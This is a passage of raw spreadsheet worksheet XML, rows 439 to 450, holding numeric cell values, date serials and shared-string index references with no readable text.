      <c r="AX439">
        <v>4</v>
      </c>
      <c r="AY439">
        <v>9</v>
      </c>
      <c r="AZ439">
        <v>2</v>
      </c>
      <c r="BA439" t="s">
        <v>16755</v>
      </c>
      <c r="BB439" t="s">
        <v>14854</v>
      </c>
      <c r="BC439" t="s">
        <v>9965</v>
      </c>
      <c r="BD439">
        <v>0</v>
      </c>
    </row>
    <row r="440" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A440">
        <v>1216</v>
      </c>
      <c r="B440" t="s">
        <v>3601</v>
      </c>
      <c r="C440" t="s">
        <v>168</v>
      </c>
      <c r="D440" t="s">
        <v>3602</v>
      </c>
      <c r="E440" t="s">
        <v>131</v>
      </c>
      <c r="F440" t="s">
        <v>3603</v>
      </c>
      <c r="G440" s="1">
        <v>44188</v>
      </c>
      <c r="H440">
        <v>6320</v>
      </c>
      <c r="I440">
        <v>6320</v>
      </c>
      <c r="J440">
        <v>0</v>
      </c>
      <c r="K440">
        <v>1</v>
      </c>
      <c r="L440">
        <v>0</v>
      </c>
      <c r="M440">
        <v>0</v>
      </c>
      <c r="N440">
        <v>0</v>
      </c>
      <c r="O440">
        <v>0</v>
      </c>
      <c r="P440">
        <v>0</v>
      </c>
      <c r="Q440">
        <v>0</v>
      </c>
      <c r="R440">
        <v>0</v>
      </c>
      <c r="S440">
        <v>0</v>
      </c>
      <c r="T440">
        <v>7</v>
      </c>
      <c r="U440">
        <v>0</v>
      </c>
      <c r="V440">
        <v>300000</v>
      </c>
      <c r="W440">
        <v>0</v>
      </c>
      <c r="X440">
        <v>0</v>
      </c>
      <c r="Y440">
        <v>0</v>
      </c>
      <c r="Z440">
        <v>0</v>
      </c>
      <c r="AA440">
        <v>0</v>
      </c>
      <c r="AB440">
        <v>0</v>
      </c>
      <c r="AC440">
        <v>0</v>
      </c>
      <c r="AD440">
        <v>0</v>
      </c>
      <c r="AE440">
        <v>6040000</v>
      </c>
      <c r="AF440" t="s">
        <v>3604</v>
      </c>
      <c r="AG440">
        <v>17520</v>
      </c>
      <c r="AH440">
        <v>13</v>
      </c>
      <c r="AJ440">
        <v>176</v>
      </c>
      <c r="AK440" t="s">
        <v>2872</v>
      </c>
      <c r="AL440" t="s">
        <v>3464</v>
      </c>
      <c r="AM440" t="s">
        <v>3605</v>
      </c>
      <c r="AN440" t="s">
        <v>82</v>
      </c>
      <c r="AO440">
        <v>1971</v>
      </c>
      <c r="AP440" t="s">
        <v>3606</v>
      </c>
      <c r="AQ440">
        <v>818993828</v>
      </c>
      <c r="AR440" t="s">
        <v>3604</v>
      </c>
      <c r="AS440" t="s">
        <v>71</v>
      </c>
      <c r="AT440" t="s">
        <v>58</v>
      </c>
      <c r="AU440">
        <v>21</v>
      </c>
      <c r="AV440">
        <v>1</v>
      </c>
      <c r="AW440">
        <v>10</v>
      </c>
      <c r="AX440">
        <v>0</v>
      </c>
      <c r="AY440">
        <v>86</v>
      </c>
      <c r="AZ440">
        <v>43</v>
      </c>
      <c r="BA440" t="s">
        <v>17020</v>
      </c>
      <c r="BB440" t="s">
        <v>15132</v>
      </c>
      <c r="BC440" t="s">
        <v>12070</v>
      </c>
      <c r="BD440">
        <v>0</v>
      </c>
    </row>
    <row r="441" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A441">
        <v>1265</v>
      </c>
      <c r="B441" t="s">
        <v>3607</v>
      </c>
      <c r="C441" t="s">
        <v>477</v>
      </c>
      <c r="D441" t="s">
        <v>3608</v>
      </c>
      <c r="E441" t="s">
        <v>3609</v>
      </c>
      <c r="F441" t="s">
        <v>3610</v>
      </c>
      <c r="G441" s="1">
        <v>44347</v>
      </c>
      <c r="H441">
        <v>6361</v>
      </c>
      <c r="I441">
        <v>6361</v>
      </c>
      <c r="J441">
        <v>3</v>
      </c>
      <c r="K441">
        <v>2</v>
      </c>
      <c r="L441">
        <v>4</v>
      </c>
      <c r="M441">
        <v>0</v>
      </c>
      <c r="N441">
        <v>0</v>
      </c>
      <c r="O441">
        <v>0</v>
      </c>
      <c r="P441">
        <v>5</v>
      </c>
      <c r="Q441">
        <v>0</v>
      </c>
      <c r="R441">
        <v>0</v>
      </c>
      <c r="S441">
        <v>1</v>
      </c>
      <c r="T441">
        <v>2</v>
      </c>
      <c r="U441">
        <v>2000000</v>
      </c>
      <c r="V441">
        <v>2</v>
      </c>
      <c r="W441">
        <v>100000</v>
      </c>
      <c r="X441">
        <v>0</v>
      </c>
      <c r="Y441">
        <v>0</v>
      </c>
      <c r="Z441">
        <v>0</v>
      </c>
      <c r="AA441">
        <v>37000</v>
      </c>
      <c r="AB441">
        <v>0</v>
      </c>
      <c r="AC441">
        <v>0</v>
      </c>
      <c r="AD441">
        <v>1</v>
      </c>
      <c r="AE441">
        <v>200000</v>
      </c>
      <c r="AF441" t="s">
        <v>3611</v>
      </c>
      <c r="AG441">
        <v>95541</v>
      </c>
      <c r="AH441">
        <v>29</v>
      </c>
      <c r="AJ441">
        <v>383</v>
      </c>
      <c r="AK441" t="s">
        <v>2026</v>
      </c>
      <c r="AL441" t="s">
        <v>3612</v>
      </c>
      <c r="AM441" t="s">
        <v>3613</v>
      </c>
      <c r="AN441" t="s">
        <v>82</v>
      </c>
      <c r="AO441">
        <v>2012</v>
      </c>
      <c r="AP441" t="s">
        <v>3614</v>
      </c>
      <c r="AQ441" t="s">
        <v>3615</v>
      </c>
      <c r="AR441" t="s">
        <v>3615</v>
      </c>
      <c r="AS441" t="s">
        <v>71</v>
      </c>
      <c r="AT441" t="s">
        <v>86</v>
      </c>
      <c r="AU441">
        <v>24</v>
      </c>
      <c r="AV441">
        <v>1</v>
      </c>
      <c r="AW441">
        <v>245</v>
      </c>
      <c r="AX441">
        <v>875</v>
      </c>
      <c r="AY441">
        <v>29</v>
      </c>
      <c r="AZ441">
        <v>22</v>
      </c>
      <c r="BA441" t="s">
        <v>16833</v>
      </c>
      <c r="BB441" t="s">
        <v>15161</v>
      </c>
      <c r="BC441">
        <v>0</v>
      </c>
      <c r="BD441" t="s">
        <v>12047</v>
      </c>
    </row>
    <row r="442" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A442">
        <v>1192</v>
      </c>
      <c r="B442" t="s">
        <v>3616</v>
      </c>
      <c r="C442" t="s">
        <v>157</v>
      </c>
      <c r="D442" t="s">
        <v>3617</v>
      </c>
      <c r="E442" t="s">
        <v>142</v>
      </c>
      <c r="F442" t="s">
        <v>3618</v>
      </c>
      <c r="G442" s="1">
        <v>44172</v>
      </c>
      <c r="H442">
        <v>6378</v>
      </c>
      <c r="I442">
        <v>6378</v>
      </c>
      <c r="J442">
        <v>1</v>
      </c>
      <c r="K442">
        <v>0</v>
      </c>
      <c r="L442">
        <v>2</v>
      </c>
      <c r="M442">
        <v>0</v>
      </c>
      <c r="N442">
        <v>0</v>
      </c>
      <c r="O442">
        <v>0</v>
      </c>
      <c r="P442">
        <v>0</v>
      </c>
      <c r="Q442">
        <v>0</v>
      </c>
      <c r="R442">
        <v>0</v>
      </c>
      <c r="S442">
        <v>1</v>
      </c>
      <c r="T442">
        <v>2</v>
      </c>
      <c r="U442">
        <v>100000</v>
      </c>
      <c r="V442">
        <v>0</v>
      </c>
      <c r="W442">
        <v>10000</v>
      </c>
      <c r="X442">
        <v>0</v>
      </c>
      <c r="Y442">
        <v>0</v>
      </c>
      <c r="Z442">
        <v>0</v>
      </c>
      <c r="AA442">
        <v>0</v>
      </c>
      <c r="AB442">
        <v>0</v>
      </c>
      <c r="AC442">
        <v>0</v>
      </c>
      <c r="AD442">
        <v>1</v>
      </c>
      <c r="AE442">
        <v>10</v>
      </c>
      <c r="AF442" t="s">
        <v>3619</v>
      </c>
      <c r="AG442">
        <v>67281</v>
      </c>
      <c r="AH442">
        <v>16</v>
      </c>
      <c r="AJ442">
        <v>240</v>
      </c>
      <c r="AK442" t="s">
        <v>3620</v>
      </c>
      <c r="AL442" t="s">
        <v>3621</v>
      </c>
      <c r="AM442" t="s">
        <v>3622</v>
      </c>
      <c r="AN442" t="s">
        <v>55</v>
      </c>
      <c r="AO442">
        <v>2018</v>
      </c>
      <c r="AP442">
        <v>81331576888</v>
      </c>
      <c r="AQ442" t="s">
        <v>3623</v>
      </c>
      <c r="AR442" t="s">
        <v>3624</v>
      </c>
      <c r="AS442" t="s">
        <v>71</v>
      </c>
      <c r="AT442" t="s">
        <v>58</v>
      </c>
      <c r="AU442">
        <v>26</v>
      </c>
      <c r="AV442">
        <v>0</v>
      </c>
      <c r="AW442">
        <v>8</v>
      </c>
      <c r="AX442">
        <v>7</v>
      </c>
      <c r="AY442">
        <v>9</v>
      </c>
      <c r="AZ442">
        <v>4</v>
      </c>
      <c r="BA442" t="s">
        <v>17326</v>
      </c>
      <c r="BB442" t="s">
        <v>15113</v>
      </c>
      <c r="BC442">
        <v>0</v>
      </c>
      <c r="BD442" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="443" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A443">
        <v>1224</v>
      </c>
      <c r="B443" t="s">
        <v>3625</v>
      </c>
      <c r="C443" t="s">
        <v>157</v>
      </c>
      <c r="D443" t="s">
        <v>3626</v>
      </c>
      <c r="E443" t="s">
        <v>111</v>
      </c>
      <c r="F443" t="s">
        <v>3627</v>
      </c>
      <c r="G443" s="1">
        <v>44194</v>
      </c>
      <c r="H443">
        <v>6416</v>
      </c>
      <c r="I443">
        <v>6416</v>
      </c>
      <c r="J443">
        <v>1</v>
      </c>
      <c r="K443">
        <v>2</v>
      </c>
      <c r="L443">
        <v>1</v>
      </c>
      <c r="M443">
        <v>0</v>
      </c>
      <c r="N443">
        <v>0</v>
      </c>
      <c r="O443">
        <v>0</v>
      </c>
      <c r="P443">
        <v>0</v>
      </c>
      <c r="Q443">
        <v>2</v>
      </c>
      <c r="R443">
        <v>4</v>
      </c>
      <c r="S443">
        <v>0</v>
      </c>
      <c r="T443">
        <v>0</v>
      </c>
      <c r="U443">
        <v>3000</v>
      </c>
      <c r="V443">
        <v>200000</v>
      </c>
      <c r="W443">
        <v>3000</v>
      </c>
      <c r="X443">
        <v>0</v>
      </c>
      <c r="Y443">
        <v>0</v>
      </c>
      <c r="Z443">
        <v>0</v>
      </c>
      <c r="AA443">
        <v>0</v>
      </c>
      <c r="AB443">
        <v>1000</v>
      </c>
      <c r="AC443">
        <v>2000</v>
      </c>
      <c r="AD443">
        <v>0</v>
      </c>
      <c r="AE443">
        <v>0</v>
      </c>
      <c r="AF443" t="s">
        <v>3628</v>
      </c>
      <c r="AG443">
        <v>62263</v>
      </c>
      <c r="AH443">
        <v>16</v>
      </c>
      <c r="AJ443">
        <v>251</v>
      </c>
      <c r="AK443" t="s">
        <v>802</v>
      </c>
      <c r="AL443" t="s">
        <v>802</v>
      </c>
      <c r="AM443" t="s">
        <v>3629</v>
      </c>
      <c r="AN443" t="s">
        <v>55</v>
      </c>
      <c r="AO443">
        <v>2016</v>
      </c>
      <c r="AP443" t="s">
        <v>3630</v>
      </c>
      <c r="AQ443" t="s">
        <v>3631</v>
      </c>
      <c r="AR443" t="s">
        <v>3632</v>
      </c>
      <c r="AS443" t="s">
        <v>71</v>
      </c>
      <c r="AT443" t="s">
        <v>58</v>
      </c>
      <c r="AU443">
        <v>25</v>
      </c>
      <c r="AV443">
        <v>0</v>
      </c>
      <c r="AW443">
        <v>16</v>
      </c>
      <c r="AX443">
        <v>0</v>
      </c>
      <c r="AY443">
        <v>5</v>
      </c>
      <c r="AZ443">
        <v>0</v>
      </c>
      <c r="BA443" t="s">
        <v>16774</v>
      </c>
      <c r="BB443" t="s">
        <v>15138</v>
      </c>
      <c r="BC443" t="s">
        <v>9693</v>
      </c>
      <c r="BD443" t="s">
        <v>10616</v>
      </c>
    </row>
    <row r="444" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A444">
        <v>1003</v>
      </c>
      <c r="B444" t="s">
        <v>3633</v>
      </c>
      <c r="C444" t="s">
        <v>157</v>
      </c>
      <c r="D444" t="s">
        <v>3634</v>
      </c>
      <c r="E444" t="s">
        <v>363</v>
      </c>
      <c r="F444" t="s">
        <v>3635</v>
      </c>
      <c r="G444" s="1">
        <v>44155</v>
      </c>
      <c r="H444">
        <v>6422</v>
      </c>
      <c r="I444">
        <v>6422</v>
      </c>
      <c r="J444">
        <v>0</v>
      </c>
      <c r="K444">
        <v>0</v>
      </c>
      <c r="L444">
        <v>0</v>
      </c>
      <c r="M444">
        <v>0</v>
      </c>
      <c r="N444">
        <v>0</v>
      </c>
      <c r="O444">
        <v>0</v>
      </c>
      <c r="P444">
        <v>0</v>
      </c>
      <c r="Q444">
        <v>0</v>
      </c>
      <c r="R444">
        <v>0</v>
      </c>
      <c r="S444">
        <v>0</v>
      </c>
      <c r="T444">
        <v>1</v>
      </c>
      <c r="U444">
        <v>0</v>
      </c>
      <c r="V444">
        <v>0</v>
      </c>
      <c r="W444">
        <v>0</v>
      </c>
      <c r="X444">
        <v>0</v>
      </c>
      <c r="Y444">
        <v>0</v>
      </c>
      <c r="Z444">
        <v>0</v>
      </c>
      <c r="AA444">
        <v>0</v>
      </c>
      <c r="AB444">
        <v>0</v>
      </c>
      <c r="AC444">
        <v>0</v>
      </c>
      <c r="AD444">
        <v>0</v>
      </c>
      <c r="AE444">
        <v>100000</v>
      </c>
      <c r="AF444" t="s">
        <v>3636</v>
      </c>
      <c r="AG444">
        <v>60184</v>
      </c>
      <c r="AH444">
        <v>16</v>
      </c>
      <c r="AJ444">
        <v>264</v>
      </c>
      <c r="AK444" t="s">
        <v>211</v>
      </c>
      <c r="AL444" t="s">
        <v>2882</v>
      </c>
      <c r="AM444" t="s">
        <v>3637</v>
      </c>
      <c r="AN444" t="s">
        <v>55</v>
      </c>
      <c r="AO444">
        <v>2014</v>
      </c>
      <c r="AP444" t="s">
        <v>3638</v>
      </c>
      <c r="AQ444" t="s">
        <v>3639</v>
      </c>
      <c r="AR444" t="s">
        <v>3640</v>
      </c>
      <c r="AS444" t="s">
        <v>71</v>
      </c>
      <c r="AT444" t="s">
        <v>58</v>
      </c>
      <c r="AU444">
        <v>0</v>
      </c>
      <c r="AV444">
        <v>0</v>
      </c>
      <c r="AW444">
        <v>0</v>
      </c>
      <c r="AX444">
        <v>0</v>
      </c>
      <c r="AY444">
        <v>6</v>
      </c>
      <c r="AZ444">
        <v>5</v>
      </c>
      <c r="BA444" t="s">
        <v>17529</v>
      </c>
      <c r="BB444" t="s">
        <v>14990</v>
      </c>
      <c r="BC444" t="s">
        <v>9522</v>
      </c>
      <c r="BD444" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="445" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A445">
        <v>979</v>
      </c>
      <c r="B445" t="s">
        <v>3641</v>
      </c>
      <c r="C445" t="s">
        <v>458</v>
      </c>
      <c r="D445" t="s">
        <v>3642</v>
      </c>
      <c r="E445" t="s">
        <v>3643</v>
      </c>
      <c r="F445" t="s">
        <v>3644</v>
      </c>
      <c r="G445" s="1">
        <v>44155</v>
      </c>
      <c r="H445">
        <v>6484</v>
      </c>
      <c r="I445">
        <v>6484</v>
      </c>
      <c r="J445">
        <v>1</v>
      </c>
      <c r="K445">
        <v>0</v>
      </c>
      <c r="L445">
        <v>1</v>
      </c>
      <c r="M445">
        <v>0</v>
      </c>
      <c r="N445">
        <v>0</v>
      </c>
      <c r="O445">
        <v>0</v>
      </c>
      <c r="P445">
        <v>0</v>
      </c>
      <c r="Q445">
        <v>2</v>
      </c>
      <c r="R445">
        <v>0</v>
      </c>
      <c r="S445">
        <v>0</v>
      </c>
      <c r="T445">
        <v>0</v>
      </c>
      <c r="U445">
        <v>80000</v>
      </c>
      <c r="V445">
        <v>0</v>
      </c>
      <c r="W445">
        <v>2000</v>
      </c>
      <c r="X445">
        <v>0</v>
      </c>
      <c r="Y445">
        <v>0</v>
      </c>
      <c r="Z445">
        <v>0</v>
      </c>
      <c r="AA445">
        <v>0</v>
      </c>
      <c r="AB445">
        <v>400</v>
      </c>
      <c r="AC445">
        <v>0</v>
      </c>
      <c r="AD445">
        <v>0</v>
      </c>
      <c r="AE445">
        <v>0</v>
      </c>
      <c r="AF445" t="s">
        <v>3645</v>
      </c>
      <c r="AG445">
        <v>29151</v>
      </c>
      <c r="AH445">
        <v>5</v>
      </c>
      <c r="AJ445">
        <v>149</v>
      </c>
      <c r="AK445" t="s">
        <v>3646</v>
      </c>
      <c r="AL445" t="s">
        <v>3647</v>
      </c>
      <c r="AM445" t="s">
        <v>3648</v>
      </c>
      <c r="AN445" t="s">
        <v>55</v>
      </c>
      <c r="AO445">
        <v>2017</v>
      </c>
      <c r="AP445">
        <v>82388309251</v>
      </c>
      <c r="AQ445" t="s">
        <v>3649</v>
      </c>
      <c r="AR445" t="s">
        <v>3650</v>
      </c>
      <c r="AS445" t="s">
        <v>71</v>
      </c>
      <c r="AT445" t="s">
        <v>58</v>
      </c>
      <c r="AU445">
        <v>26</v>
      </c>
      <c r="AV445">
        <v>0</v>
      </c>
      <c r="AW445">
        <v>0</v>
      </c>
      <c r="AX445">
        <v>0</v>
      </c>
      <c r="AY445">
        <v>22</v>
      </c>
      <c r="AZ445">
        <v>8</v>
      </c>
      <c r="BA445" t="s">
        <v>16787</v>
      </c>
      <c r="BB445" t="s">
        <v>14978</v>
      </c>
      <c r="BC445" t="s">
        <v>12120</v>
      </c>
      <c r="BD445" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="446" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A446">
        <v>1295</v>
      </c>
      <c r="B446" t="s">
        <v>3651</v>
      </c>
      <c r="C446" t="s">
        <v>99</v>
      </c>
      <c r="D446" t="s">
        <v>3652</v>
      </c>
      <c r="E446" t="s">
        <v>142</v>
      </c>
      <c r="F446" t="s">
        <v>3653</v>
      </c>
      <c r="G446" s="1">
        <v>44145</v>
      </c>
      <c r="H446">
        <v>6496</v>
      </c>
      <c r="I446">
        <v>6496</v>
      </c>
      <c r="J446">
        <v>1</v>
      </c>
      <c r="K446">
        <v>0</v>
      </c>
      <c r="L446">
        <v>0</v>
      </c>
      <c r="M446">
        <v>0</v>
      </c>
      <c r="N446">
        <v>0</v>
      </c>
      <c r="O446">
        <v>0</v>
      </c>
      <c r="P446">
        <v>0</v>
      </c>
      <c r="Q446">
        <v>0</v>
      </c>
      <c r="R446">
        <v>0</v>
      </c>
      <c r="S446">
        <v>1</v>
      </c>
      <c r="T446">
        <v>0</v>
      </c>
      <c r="U446">
        <v>200000</v>
      </c>
      <c r="V446">
        <v>0</v>
      </c>
      <c r="W446">
        <v>0</v>
      </c>
      <c r="X446">
        <v>0</v>
      </c>
      <c r="Y446">
        <v>0</v>
      </c>
      <c r="Z446">
        <v>0</v>
      </c>
      <c r="AA446">
        <v>0</v>
      </c>
      <c r="AB446">
        <v>0</v>
      </c>
      <c r="AC446">
        <v>0</v>
      </c>
      <c r="AD446">
        <v>1</v>
      </c>
      <c r="AE446">
        <v>0</v>
      </c>
      <c r="AF446" t="s">
        <v>3654</v>
      </c>
      <c r="AG446">
        <v>14440</v>
      </c>
      <c r="AH446">
        <v>12</v>
      </c>
      <c r="AJ446">
        <v>160</v>
      </c>
      <c r="AK446" t="s">
        <v>114</v>
      </c>
      <c r="AL446" t="s">
        <v>114</v>
      </c>
      <c r="AM446" t="s">
        <v>3655</v>
      </c>
      <c r="AN446" t="s">
        <v>55</v>
      </c>
      <c r="AO446">
        <v>2015</v>
      </c>
      <c r="AP446" t="s">
        <v>3656</v>
      </c>
      <c r="AQ446">
        <v>81315507637</v>
      </c>
      <c r="AR446" t="s">
        <v>3657</v>
      </c>
      <c r="AS446" t="s">
        <v>71</v>
      </c>
      <c r="AT446" t="s">
        <v>58</v>
      </c>
      <c r="AU446">
        <v>0</v>
      </c>
      <c r="AV446">
        <v>0</v>
      </c>
      <c r="AW446">
        <v>0</v>
      </c>
      <c r="AX446">
        <v>0</v>
      </c>
      <c r="AY446">
        <v>14</v>
      </c>
      <c r="AZ446">
        <v>4</v>
      </c>
      <c r="BA446" t="s">
        <v>16840</v>
      </c>
      <c r="BB446" t="s">
        <v>15180</v>
      </c>
      <c r="BC446" t="s">
        <v>12126</v>
      </c>
      <c r="BD446">
        <v>0</v>
      </c>
    </row>
    <row r="447" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A447">
        <v>1124</v>
      </c>
      <c r="B447" t="s">
        <v>3658</v>
      </c>
      <c r="C447" t="s">
        <v>157</v>
      </c>
      <c r="D447" t="s">
        <v>3659</v>
      </c>
      <c r="E447" t="s">
        <v>142</v>
      </c>
      <c r="F447" t="s">
        <v>3660</v>
      </c>
      <c r="G447" s="1">
        <v>44176</v>
      </c>
      <c r="H447">
        <v>6506</v>
      </c>
      <c r="I447">
        <v>6506</v>
      </c>
      <c r="J447">
        <v>2</v>
      </c>
      <c r="K447">
        <v>0</v>
      </c>
      <c r="L447">
        <v>1</v>
      </c>
      <c r="M447">
        <v>0</v>
      </c>
      <c r="N447">
        <v>0</v>
      </c>
      <c r="O447">
        <v>0</v>
      </c>
      <c r="P447">
        <v>0</v>
      </c>
      <c r="Q447">
        <v>0</v>
      </c>
      <c r="R447">
        <v>0</v>
      </c>
      <c r="S447">
        <v>0</v>
      </c>
      <c r="T447">
        <v>0</v>
      </c>
      <c r="U447">
        <v>600</v>
      </c>
      <c r="V447">
        <v>0</v>
      </c>
      <c r="W447">
        <v>8</v>
      </c>
      <c r="X447">
        <v>0</v>
      </c>
      <c r="Y447">
        <v>0</v>
      </c>
      <c r="Z447">
        <v>0</v>
      </c>
      <c r="AA447">
        <v>0</v>
      </c>
      <c r="AB447">
        <v>0</v>
      </c>
      <c r="AC447">
        <v>0</v>
      </c>
      <c r="AD447">
        <v>0</v>
      </c>
      <c r="AE447">
        <v>0</v>
      </c>
      <c r="AF447" t="s">
        <v>414</v>
      </c>
      <c r="AG447">
        <v>62264</v>
      </c>
      <c r="AH447">
        <v>16</v>
      </c>
      <c r="AJ447">
        <v>251</v>
      </c>
      <c r="AK447" t="s">
        <v>415</v>
      </c>
      <c r="AL447" t="s">
        <v>416</v>
      </c>
      <c r="AM447" t="s">
        <v>3661</v>
      </c>
      <c r="AN447" t="s">
        <v>55</v>
      </c>
      <c r="AO447">
        <v>2016</v>
      </c>
      <c r="AP447" t="s">
        <v>3662</v>
      </c>
      <c r="AQ447" t="s">
        <v>419</v>
      </c>
      <c r="AR447" t="s">
        <v>420</v>
      </c>
      <c r="AS447" t="s">
        <v>71</v>
      </c>
      <c r="AT447" t="s">
        <v>58</v>
      </c>
      <c r="AU447">
        <v>309</v>
      </c>
      <c r="AV447">
        <v>1</v>
      </c>
      <c r="AW447">
        <v>6</v>
      </c>
      <c r="AX447">
        <v>25</v>
      </c>
      <c r="AY447">
        <v>2</v>
      </c>
      <c r="AZ447">
        <v>0</v>
      </c>
      <c r="BA447" t="s">
        <v>17545</v>
      </c>
      <c r="BB447" t="s">
        <v>15064</v>
      </c>
      <c r="BC447">
        <v>0</v>
      </c>
      <c r="BD447" t="s">
        <v>12233</v>
      </c>
    </row>
    <row r="448" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A448">
        <v>1069</v>
      </c>
      <c r="B448" t="s">
        <v>3663</v>
      </c>
      <c r="C448" t="s">
        <v>129</v>
      </c>
      <c r="D448" t="s">
        <v>3664</v>
      </c>
      <c r="E448" t="s">
        <v>49</v>
      </c>
      <c r="F448" t="s">
        <v>3665</v>
      </c>
      <c r="G448" s="1">
        <v>44131</v>
      </c>
      <c r="H448">
        <v>6521</v>
      </c>
      <c r="I448">
        <v>6521</v>
      </c>
      <c r="J448">
        <v>1</v>
      </c>
      <c r="K448">
        <v>0</v>
      </c>
      <c r="L448">
        <v>0</v>
      </c>
      <c r="M448">
        <v>0</v>
      </c>
      <c r="N448">
        <v>0</v>
      </c>
      <c r="O448">
        <v>0</v>
      </c>
      <c r="P448">
        <v>0</v>
      </c>
      <c r="Q448">
        <v>1</v>
      </c>
      <c r="R448">
        <v>16</v>
      </c>
      <c r="S448">
        <v>0</v>
      </c>
      <c r="T448">
        <v>1</v>
      </c>
      <c r="U448">
        <v>1000</v>
      </c>
      <c r="V448">
        <v>0</v>
      </c>
      <c r="W448">
        <v>0</v>
      </c>
      <c r="X448">
        <v>0</v>
      </c>
      <c r="Y448">
        <v>0</v>
      </c>
      <c r="Z448">
        <v>0</v>
      </c>
      <c r="AA448">
        <v>0</v>
      </c>
      <c r="AB448">
        <v>250</v>
      </c>
      <c r="AC448">
        <v>4000</v>
      </c>
      <c r="AD448">
        <v>0</v>
      </c>
      <c r="AE448">
        <v>100</v>
      </c>
      <c r="AF448" t="s">
        <v>2807</v>
      </c>
      <c r="AG448">
        <v>15124</v>
      </c>
      <c r="AH448">
        <v>11</v>
      </c>
      <c r="AJ448">
        <v>270</v>
      </c>
      <c r="AK448" t="s">
        <v>1048</v>
      </c>
      <c r="AL448" t="s">
        <v>1048</v>
      </c>
      <c r="AM448" t="s">
        <v>3666</v>
      </c>
      <c r="AN448" t="s">
        <v>55</v>
      </c>
      <c r="AO448">
        <v>2016</v>
      </c>
      <c r="AP448">
        <v>2155910581</v>
      </c>
      <c r="AQ448">
        <v>2155910581</v>
      </c>
      <c r="AR448" t="s">
        <v>2807</v>
      </c>
      <c r="AS448" t="s">
        <v>57</v>
      </c>
      <c r="AT448" t="s">
        <v>58</v>
      </c>
      <c r="AU448">
        <v>25</v>
      </c>
      <c r="AV448">
        <v>2</v>
      </c>
      <c r="AW448">
        <v>8</v>
      </c>
      <c r="AX448">
        <v>0</v>
      </c>
      <c r="AY448">
        <v>2</v>
      </c>
      <c r="AZ448">
        <v>2</v>
      </c>
      <c r="BA448" t="s">
        <v>17539</v>
      </c>
      <c r="BB448" t="s">
        <v>15030</v>
      </c>
      <c r="BC448">
        <v>0</v>
      </c>
      <c r="BD448" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="449" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A449">
        <v>1165</v>
      </c>
      <c r="B449" t="s">
        <v>3667</v>
      </c>
      <c r="C449" t="s">
        <v>157</v>
      </c>
      <c r="D449" t="s">
        <v>3668</v>
      </c>
      <c r="E449" t="s">
        <v>142</v>
      </c>
      <c r="F449" t="s">
        <v>562</v>
      </c>
      <c r="G449" s="1">
        <v>44154</v>
      </c>
      <c r="H449">
        <v>6530</v>
      </c>
      <c r="I449">
        <v>6530</v>
      </c>
      <c r="J449">
        <v>2</v>
      </c>
      <c r="K449">
        <v>0</v>
      </c>
      <c r="L449">
        <v>0</v>
      </c>
      <c r="M449">
        <v>2</v>
      </c>
      <c r="N449">
        <v>0</v>
      </c>
      <c r="O449">
        <v>0</v>
      </c>
      <c r="P449">
        <v>0</v>
      </c>
      <c r="Q449">
        <v>1</v>
      </c>
      <c r="R449">
        <v>0</v>
      </c>
      <c r="S449">
        <v>0</v>
      </c>
      <c r="T449">
        <v>0</v>
      </c>
      <c r="U449">
        <v>0</v>
      </c>
      <c r="V449">
        <v>0</v>
      </c>
      <c r="W449">
        <v>0</v>
      </c>
      <c r="X449">
        <v>0</v>
      </c>
      <c r="Y449">
        <v>0</v>
      </c>
      <c r="Z449">
        <v>0</v>
      </c>
      <c r="AA449">
        <v>0</v>
      </c>
      <c r="AB449">
        <v>0</v>
      </c>
      <c r="AC449">
        <v>0</v>
      </c>
      <c r="AD449">
        <v>0</v>
      </c>
      <c r="AE449">
        <v>0</v>
      </c>
      <c r="AF449" t="s">
        <v>563</v>
      </c>
      <c r="AG449">
        <v>68362</v>
      </c>
      <c r="AH449">
        <v>16</v>
      </c>
      <c r="AJ449">
        <v>239</v>
      </c>
      <c r="AK449" t="s">
        <v>564</v>
      </c>
      <c r="AL449" t="s">
        <v>565</v>
      </c>
      <c r="AM449" t="s">
        <v>3669</v>
      </c>
      <c r="AN449" t="s">
        <v>82</v>
      </c>
      <c r="AO449">
        <v>2004</v>
      </c>
      <c r="AP449">
        <v>338672221</v>
      </c>
      <c r="AQ449" t="s">
        <v>3670</v>
      </c>
      <c r="AR449" t="s">
        <v>569</v>
      </c>
      <c r="AS449" t="s">
        <v>71</v>
      </c>
      <c r="AT449" t="s">
        <v>86</v>
      </c>
      <c r="AU449">
        <v>25</v>
      </c>
      <c r="AV449">
        <v>1</v>
      </c>
      <c r="AW449">
        <v>0</v>
      </c>
      <c r="AX449">
        <v>0</v>
      </c>
      <c r="AY449">
        <v>155</v>
      </c>
      <c r="AZ449">
        <v>462</v>
      </c>
      <c r="BA449" t="s">
        <v>17241</v>
      </c>
      <c r="BB449" t="s">
        <v>14577</v>
      </c>
      <c r="BC449" t="s">
        <v>12141</v>
      </c>
      <c r="BD449" t="s">
        <v>10133</v>
      </c>
    </row>
    <row r="450" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A450">
        <v>1083</v>
      </c>
      <c r="B450" t="s">
        <v>3671</v>
      </c>
      <c r="C450" t="s">
        <v>74</v>
      </c>
      <c r="D450" t="s">
        <v>3672</v>
      </c>
      <c r="E450" t="s">
        <v>49</v>
      </c>
      <c r="F450" t="s">
        <v>3673</v>
      </c>
      <c r="G450" s="1">
        <v>44173</v>
      </c>
      <c r="H450">
        <v>6556</v>
      </c>
      <c r="I450">
        <v>6556</v>
      </c>
      <c r="J450">
        <v>0</v>
      </c>
      <c r="K450">
        <v>3</v>
      </c>
      <c r="L450">
        <v>0</v>
      </c>
      <c r="M450">
        <v>0</v>
      </c>
      <c r="N450">
        <v>0</v>
      </c>
      <c r="O450">
        <v>0</v>
      </c>
      <c r="P450">
        <v>0</v>
      </c>
      <c r="Q450">
        <v>10</v>
      </c>
      <c r="R450">
        <v>50</v>
      </c>
      <c r="S450">
        <v>0</v>
      </c>
